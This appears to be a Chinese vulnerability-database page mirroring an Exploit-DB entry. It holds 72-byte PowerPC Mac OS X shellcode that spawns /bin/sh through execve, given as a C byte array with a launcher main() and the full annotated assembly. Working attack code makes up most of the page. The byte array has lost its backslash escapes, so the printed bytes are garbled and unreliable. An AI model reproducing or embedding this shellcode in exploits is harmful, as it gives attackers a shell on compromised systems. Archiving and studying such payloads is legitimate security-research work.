OSX/PPC – execve(/bin/sh) Shellcode (72 bytes)-安全小百科

OSX/PPC – execve(/bin/sh) Shellcode (72 bytes)

漏洞ID	1054645	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	OSX_PPC	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13481

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
PPC OSX/Darwin Shellcode by B-r00t. 2003.
Does execve(/bin/sh); exit(0);
See ASM below.
72 Bytes.
*/

char shellcode[] =
"x7cxa5x2ax79x40x82xffxfd"
"x7dx68x02xa6x3bxebx01x70"
"x39x40x01x70x39x1fxfexcf"
"x7cxa8x29xaex38x7fxfexc8"
"x90x61xffxf8x90xa1xffxfc"
"x38x81xffxf8x38x0axfexcb"
"x44xffxffx02x7cxa3x2bx78"
"x38x0axfex91x44xffxffx02"
"x2fx62x69x6ex2fx73x68x58";

int main (void)
{
        __asm__("b _shellcode");
}


/*
; PPC OS X / Darwin Shellcode by B-r00t.
; execve(/bin/sh) exit(0)
;
.globl _main
.text
_main:
        xor.    r5, r5, r5
        bnel    _main
        mflr    r11
        addi    r31, r11, 368
        li      r10, 368
        addi    r8, r31, -305
        stbx    r5, r8, r5
        addi    r3, r31, -312
        stw     r3, -8(r1)
        stw     r5, -4(r1)
        subi    r4, r1, 8
        addi    r0, r10, -309
        .long   0x44ffff02
        mr      r3, r5
        addi    r0, r10, -367
        .long   0x44ffff02
path:   .asciz  "/bin/shX"
 
*/

// milw0rm.com [2004-09-26]

相关推荐: GuildFTPD Remote Buffer Overflow Vulnerability

GuildFTPD Remote Buffer Overflow Vulnerability 漏洞ID 1103218 漏洞类型 Boundary Condition Error 发布时间 2001-05-22 更新时间 2001-05-22 CVE编号 N/…

文章版权归作者所有，未经允许请勿转载。

THE END